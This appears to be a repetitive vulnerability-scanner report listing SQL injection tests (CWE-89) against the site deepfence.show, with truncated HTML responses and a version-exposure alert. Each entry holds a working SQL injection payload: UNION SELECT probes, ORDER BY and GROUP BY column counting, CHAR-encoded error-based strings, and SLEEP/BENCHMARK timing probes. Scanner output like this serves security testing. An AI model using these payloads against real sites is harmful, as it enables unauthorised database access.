<!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1349\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1350\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1351\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1352\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' ORDER BY 3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1353\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1354\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1355\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1356\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1357\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1358\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1359\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 15--ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1360\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1361Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1362\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1' GROUP BY 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 